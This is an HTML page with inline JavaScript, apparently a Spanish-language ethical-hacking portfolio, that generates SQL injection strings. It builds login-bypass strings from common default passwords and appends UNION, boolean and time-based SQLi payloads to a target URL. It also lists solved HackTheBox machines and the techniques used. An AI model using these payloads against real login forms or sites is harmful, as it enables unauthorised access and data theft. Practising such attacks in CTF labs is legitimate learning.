
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>MalGen - Payload Generator</title>
  <link rel="stylesheet" href="assets/css/style.css" />
</head>
<body>
  <img class="banner" src="assets/img/banner.jpg" alt="Portada">
  <header>
    <img class="profile" src="assets/img/profile.jpg" alt="Perfil" />
    <h1>@lyhack27</h1>
    <p>Ethical Hacking | SQLi Payloads | CTF Enthusiast</p>
  </header>

  <div class="box">
    <h2>Payload de Login</h2>
    <label for="usuario">Usuario</label>
    <input type="text" id="usuario" placeholder="admin" />

    <label for="contrasena">Contraseña común</label>
    <select id="contrasena">
      <option value="admin">admin (por defecto)</option>
      <option value="123456">123456 (muy común)</option>
      <option value="password">password (genérica)</option>
      <option value="1234">1234 (por defecto)</option>
      <option value="root">root (privilegiado)</option>
      <option value="admin' --">admin' -- (bypass)</option>
      <option value="' OR ''='">' OR ''=' (vacío válido)</option>
      <option value="\" or 1=1 --">" or 1=1 -- (condición verdadera)</option>
    </select>

    <button onclick="generarLoginPayload()">Generar Payload</button>
    <pre id="loginResultado"></pre>
  </div>

  <div class="box">
    <h2>Payload para URL</h2>
    <label for="url">URL objetivo</label>
    <input type="text" id="url" placeholder="http://example.com/vulnerable.php?id=" />

    <label for="tipo">Tipo de Payload</label>
    <select id="tipo">
      <option value="' OR '1'='1">Bypass SQL</option>
      <option value="' UNION SELECT null--">UNION SELECT</option>
      <option value="' AND 1=1 --">Booleano verdadero</option>
      <option value="' AND 1=2 --">Booleano falso</option>
      <option value="' AND SLEEP(5) --">Time-based</option>
    </select>

    <button onclick="generarURLPayload()">Generar URL</button>
    <pre id="urlResultado"></pre>
  </div>

  <div class="box">
    <h2>Máquinas Resueltas</h2>
    <div class="machines">
      <div class="machine-card">
        <strong>HTB - Driver:</strong> Uso de PrintNightmare para RCE y secuestro de spooler.
      </div>
      <div class="machine-card">
        <strong>HTB - Validation:</strong> SQLi inicial, luego enumeración LDAP y acceso.
      </div>
      <div class="machine-card">
        <strong>INFILTRATOR.HTB:</strong> Abuso de delegación Kerberos y SPN scan.
      </div>
      <div class="machine-card">
        <strong>Multimaster:</strong> Enumeración SMB, password reuse, acceso LDAP y pwn.
      </div>
    </div>
  </div>

  <script>
    function generarLoginPayload() {
      const user = document.getElementById("usuario").value;
      const pass = document.getElementById("contrasena").value;
      const payload = `Usuario: '${user}' OR '1'='1 | Contraseña: '${pass}' OR '1'='1`;
      document.getElementById("loginResultado").textContent = payload;
    }

    function generarURLPayload() {
      const url = document.getElementById("url").value;
      const tipo = document.getElementById("tipo").value;
      document.getElementById("urlResultado").textContent = url + tipo;
    }
  </script>
</body>
</html>
